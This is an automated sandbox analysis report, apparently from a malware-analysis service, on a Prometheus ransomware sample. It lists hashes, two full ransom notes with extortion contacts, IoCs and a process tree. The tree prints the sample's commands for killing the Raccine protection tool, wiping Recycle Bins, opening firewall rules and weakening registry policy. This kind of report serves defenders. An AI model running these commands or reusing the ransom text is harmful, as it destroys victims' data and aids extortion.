prometheus | 9bf0633f41d2962ba5e2895ece2ef9fa7b546ada311ca30f330f0d261a7fb184

General

Target

dd4eb8aa3371b7fd821a7a9730c924cf.exe
Size

194KB
MD5

dd4eb8aa3371b7fd821a7a9730c924cf
SHA1

3e53f7bf7dcb8569aaf0f3a3bcf67bda4c01c054
SHA256

9bf0633f41d2962ba5e2895ece2ef9fa7b546ada311ca30f330f0d261a7fb184
SHA512

12e760a59377632548f41bbdb98941a04c7d32b5d084f70b23db702dbeabb1e7a489df6d03af40da977a463150e4d144641fbc4640037e8858897a0509c9f356

Score

10^/10

prometheus discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. We recommend you upload 3 encrypted files in https://privatlab.com/file and paste link to you message. We will demonstrate that we can recover your files. * Please note that files must not contain any valuable information. Do you really want to restore your files? 1) Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open website: http://sonarmsniko2lvfu.onion/?a=reg c) Register account d) Click Compose and write to us, our username: Prometheus, in message write Your Key Identifier (it is at the end of file) 2) Using a email Write to 3 emails address at once, in message write Your Key Identifier (it is at the end of file) : prometheushelp@mail.ch prometheushelp@airmail.cc Prometheus.help@protonmail.ch We recommend using 1 method via TOR browser to contact us. Email letters may not reach us. Therefore, if you do not receive a response within 12 hours, please use method 1. * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. *For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data! Key Identifier: eMYQaF9UnXGT1YvwIKo2S+Qlp2shG+aZ3nwfT2xixyjqfbPx4ip2tCHoSkW7XynZb/9lph4+n0UiVp3EFWlBh3fPWsK5F6bmfY/5E7G40/JDir4haDstLeslTB8mJE0z6KegjYWbs1doPEVjP7tNxywBlwNDa2SbqKyYldRLxxP1/9DxDO8UOvHh25lISJv7sE8nmx/dAB3t8jELmEtDHaLcR1OJBZKylQ6GUOEJSnggiKMm8gEVu3ee7+Hroppy+qrPr2VUbPx+7xDZoDvf/9WcfTEFFTX/j7UCrAwqRqV4W4Q0lk305DuUQjoRq8MJSsDVJBuXd/1IHsUvI3ZPcsKe0a7SythsQ/6zkCGB6VQPt9ZBxmoo3rB/yABRVu+I1p8OxpDVKMxfQLJECTDB2ZhYmQKXdJGU1lPlOO9OhsydtzfQjlXwWnE5F8sU95WcOkrGyGLzR/OfF6Xk/nN3AgiVFgIYUiT3NR4cTO4d93yrmb9VR7mnwNl7kgMqQpJn/DO2yc4/8YngzrBhYwEbrijNZwRs2eB/Dc6ihxv8trMS1wIivqsqqZkixPO2RR2NLGiVUAKslhDIK+hQglzpg02u7srC8ESbx8zABTLtRaC01WC1I8hTv2LVTwwGfAZ0AYNwV4l+4IJoA1LRcMjqnKHUXds+nZevY7TL0l2++DY=

Emails

prometheushelp@mail.ch

prometheushelp@airmail.cc

Prometheus.help@protonmail.ch

URLs

https://privatlab.com/file

http://sonarmsniko2lvfu.onion/?a=reg

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. We recommend you upload 3 encrypted files in https://privatlab.com/file and paste link to you message. We will demonstrate that we can recover your files. * Please note that files must not contain any valuable information. Do you really want to restore your files? 1) Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open website: http://sonarmsniko2lvfu.onion/?a=reg c) Register account d) Click Compose and write to us, our username: Prometheus, in message write Your Key Identifier (it is at the end of file) 2) Using a email Write to 3 emails address at once, in message write Your Key Identifier (it is at the end of file) : prometheushelp@mail.ch prometheushelp@airmail.cc Prometheus.help@protonmail.ch We recommend using 1 method via TOR browser to contact us. Email letters may not reach us. Therefore, if you do not receive a response within 12 hours, please use method 1. * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. *For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data! Key Identifier: eMYQaF9UnXGT1YvwIKo2S+Qlp2shG+aZ3nwfT2xixyjqfbPx4ip2tCHoSkW7XynZb/9lph4+n0UiVp3EFWlBh3fPWsK5F6bmfY/5E7G40/JDir4haDstLeslTB8mJE0z6KegjYWbs1doPEVjP7tNxywBlwNDa2SbqKyYldRLxxP1/9DxDO8UOvHh25lISJv7sE8nmx/dAB3t8jELmEtDHaLcR1OJBZKylQ6GUOEJSnggiKMm8gEVu3ee7+Hroppy+qrPr2VUbPx+7xDZoDvf/9WcfTEFFTX/j7UCrAwqRqV4W4Q0lk305DuUQjoRq8MJSsDVJBuXd/1IHsUvI3ZPcsKe0a7SythsQ/6zkCGB6VQPt9ZBxmoo3rB/yABRVu+I1p8OxpDVKMxfQLJECTDB2ZhYmQKXdJGU1lPlOO9OhsydtzfQjlXwWnE5F8sU95WcOkrGyGLzR/OfF6Xk/nN3AgiVFgIYUiT3NR4cTO4d93yrmb9VR7mnwNl7kgMqQpJn/DO2yc4/8YngzrBhYwEbrijNZwRs2eB/Dc6ihxv8trMS1wIivqsqqZkixPO2RR2NLGiVUAKslhDIK+hQglzpg02u7srC8ESbx8zABTLtRaC01WC1I8hTv2LVTwwGfAZ0AYNwV4l+4IJoA1LRcMjqnKHUXds+nZevY7TL0l2++DY=

Emails

prometheushelp@mail.ch

prometheushelp@airmail.cc

Prometheus.help@protonmail.ch

URLs

https://privatlab.com/file

http://sonarmsniko2lvfu.onion/?a=reg

Signatures

Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
ransomware prometheus

Blocklisted process makes network request 18 IoCs

Processes:

mshta.exe

flow	pid	process
28	3764	mshta.exe
29	3764	mshta.exe
31	3764	mshta.exe
33	3764	mshta.exe
34	3764	mshta.exe
35	3764	mshta.exe
36	3764	mshta.exe
37	3764	mshta.exe
38	3764	mshta.exe
39	3764	mshta.exe
40	3764	mshta.exe
41	3764	mshta.exe
42	3764	mshta.exe
43	3764	mshta.exe
44	3764	mshta.exe
45	3764	mshta.exe
46	3764	mshta.exe
47	3764	mshta.exe

Downloads MZ/PE file
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description flow ioc

HTTP URL 13 http://live.sysinternals.com/PsExec.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
ransomware

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

description ioc process

File opened for modification C:\Users\Admin\Pictures\MergeUpdate.tiff dd4eb8aa3371b7fd821a7a9730c924cf.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

6008 cmd.exe

description	flow	ioc
HTTP URL	13	http://live.sysinternals.com/PsExec.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\MergeUpdate.tiff	dd4eb8aa3371b7fd821a7a9730c924cf.exe

pid	process
6008	cmd.exe

Drops startup file 1 IoCs

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	dd4eb8aa3371b7fd821a7a9730c924cf.exe

Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

3604 icacls.exe
3612 icacls.exe
3596 icacls.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 icanhazip.com

pid	process
3604	icacls.exe
3612	icacls.exe
3596	icacls.exe

flow	ioc
23	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	dd4eb8aa3371b7fd821a7a9730c924cf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..."	dd4eb8aa3371b7fd821a7a9730c924cf.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

2164 net.exe

pid	process
2164	net.exe

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3120	taskkill.exe
3148	taskkill.exe
3220	taskkill.exe
3252	taskkill.exe
3492	taskkill.exe
3532	taskkill.exe
3096	taskkill.exe
3204	taskkill.exe
3268	taskkill.exe
3444	taskkill.exe
3484	taskkill.exe
3508	taskkill.exe
3088	taskkill.exe
3380	taskkill.exe
3156	taskkill.exe
3196	taskkill.exe
3188	taskkill.exe
3212	taskkill.exe
3244	taskkill.exe
3284	taskkill.exe
3364	taskkill.exe
764	taskkill.exe
2464	taskkill.exe
3140	taskkill.exe
3236	taskkill.exe
3260	taskkill.exe
3292	taskkill.exe
3104	taskkill.exe
3128	taskkill.exe
3228	taskkill.exe
3372	taskkill.exe
3356	taskkill.exe
3500	taskkill.exe
3080	taskkill.exe
3276	taskkill.exe
3404	taskkill.exe
3436	taskkill.exe
3428	taskkill.exe
3468	taskkill.exe
3476	taskkill.exe
3556	taskkill.exe
1068	taskkill.exe
3112	taskkill.exe
3172	taskkill.exe
3180	taskkill.exe
3308	taskkill.exe
3452	taskkill.exe
3516	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1808 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4060 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1808	reg.exe

pid	process
4060	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

pid	process
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exetaskkill.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe
Token: SeDebugPrivilege	1068	taskkill.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	3228	taskkill.exe
Token: SeDebugPrivilege	3128	taskkill.exe
Token: SeDebugPrivilege	2464	taskkill.exe
Token: SeDebugPrivilege	3260	taskkill.exe
Token: SeDebugPrivilege	3112	taskkill.exe
Token: SeDebugPrivilege	3088	taskkill.exe
Token: SeDebugPrivilege	764	taskkill.exe
Token: SeDebugPrivilege	3104	taskkill.exe
Token: SeDebugPrivilege	3120	taskkill.exe
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	3236	taskkill.exe
Token: SeDebugPrivilege	3244	taskkill.exe
Token: SeDebugPrivilege	3180	taskkill.exe
Token: SeDebugPrivilege	3140	taskkill.exe
Token: SeDebugPrivilege	3156	taskkill.exe
Token: SeDebugPrivilege	3428	taskkill.exe
Token: SeDebugPrivilege	3172	taskkill.exe
Token: SeDebugPrivilege	3148	taskkill.exe
Token: SeDebugPrivilege	3220	taskkill.exe
Token: SeDebugPrivilege	3372	taskkill.exe
Token: SeDebugPrivilege	3532	taskkill.exe
Token: SeDebugPrivilege	3484	taskkill.exe
Token: SeDebugPrivilege	3500	taskkill.exe
Token: SeDebugPrivilege	3508	taskkill.exe
Token: SeDebugPrivilege	3436	taskkill.exe
Token: SeDebugPrivilege	3468	taskkill.exe
Token: SeDebugPrivilege	3452	taskkill.exe
Token: SeDebugPrivilege	3356	taskkill.exe
Token: SeDebugPrivilege	3212	taskkill.exe
Token: SeDebugPrivilege	3444	taskkill.exe
Token: SeDebugPrivilege	3364	taskkill.exe
Token: SeDebugPrivilege	3096	taskkill.exe
Token: SeDebugPrivilege	3080	taskkill.exe
Token: SeDebugPrivilege	3276	taskkill.exe
Token: SeDebugPrivilege	3308	taskkill.exe
Token: SeDebugPrivilege	3292	taskkill.exe
Token: SeDebugPrivilege	3404	taskkill.exe
Token: SeDebugPrivilege	3268	taskkill.exe
Token: SeDebugPrivilege	3380	taskkill.exe
Token: SeDebugPrivilege	3556	taskkill.exe
Token: SeDebugPrivilege	3284	taskkill.exe
Token: SeDebugPrivilege	3516	taskkill.exe
Token: SeDebugPrivilege	3492	taskkill.exe
Token: SeDebugPrivilege	3204	taskkill.exe
Token: SeDebugPrivilege	3476	taskkill.exe
Token: SeDebugPrivilege	3252	taskkill.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

pid process

2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

pid process

2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe
2020 dd4eb8aa3371b7fd821a7a9730c924cf.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

description	pid	process	target process
PID 2020 wrote to memory of 1068	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	taskkill.exe
PID 2020 wrote to memory of 1068	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	taskkill.exe
PID 2020 wrote to memory of 1068	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	taskkill.exe
PID 2020 wrote to memory of 1068	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	taskkill.exe
PID 2020 wrote to memory of 1760	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 2020 wrote to memory of 1760	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 2020 wrote to memory of 1760	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 2020 wrote to memory of 1760	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 2020 wrote to memory of 1808	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 2020 wrote to memory of 1808	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 2020 wrote to memory of 1808	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 2020 wrote to memory of 1808	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	reg.exe
PID 2020 wrote to memory of 1516	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	schtasks.exe
PID 2020 wrote to memory of 1516	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	schtasks.exe
PID 2020 wrote to memory of 1516	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	schtasks.exe
PID 2020 wrote to memory of 1516	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	schtasks.exe
PID 2020 wrote to memory of 1684	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 2020 wrote to memory of 1684	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 2020 wrote to memory of 1684	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 2020 wrote to memory of 1684	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 2020 wrote to memory of 1172	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 2020 wrote to memory of 1172	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 2020 wrote to memory of 1172	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 2020 wrote to memory of 1172	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	cmd.exe
PID 2020 wrote to memory of 1512	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 2020 wrote to memory of 1512	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 2020 wrote to memory of 1512	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 2020 wrote to memory of 1512	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 2020 wrote to memory of 572	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 2020 wrote to memory of 572	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 2020 wrote to memory of 572	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 2020 wrote to memory of 572	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	netsh.exe
PID 2020 wrote to memory of 660	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 660	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 660	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 660	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1896	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	conhost.exe
PID 2020 wrote to memory of 1896	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	conhost.exe
PID 2020 wrote to memory of 1896	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	conhost.exe
PID 2020 wrote to memory of 1896	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	conhost.exe
PID 2020 wrote to memory of 1780	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1780	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1780	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1780	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1984	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1984	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1984	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1984	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1620	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1620	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1620	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1620	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1892	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1892	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1892	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1892	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1784	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1784	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1784	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 1784	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 864	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 864	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 864	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe
PID 2020 wrote to memory of 864	2020	dd4eb8aa3371b7fd821a7a9730c924cf.exe	sc.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

dd4eb8aa3371b7fd821a7a9730c924cf.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	dd4eb8aa3371b7fd821a7a9730c924cf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..."	dd4eb8aa3371b7fd821a7a9730c924cf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..."	dd4eb8aa3371b7fd821a7a9730c924cf.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	dd4eb8aa3371b7fd821a7a9730c924cf.exe

C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe
"C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2020

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1068

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:1760

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:1808

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:1516

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
PID:1684

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
2⤵
PID:1172

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:1512

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
2⤵
PID:572

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:660

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:1896

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:1780

C:\Windows\SysWOW64\sc.exe
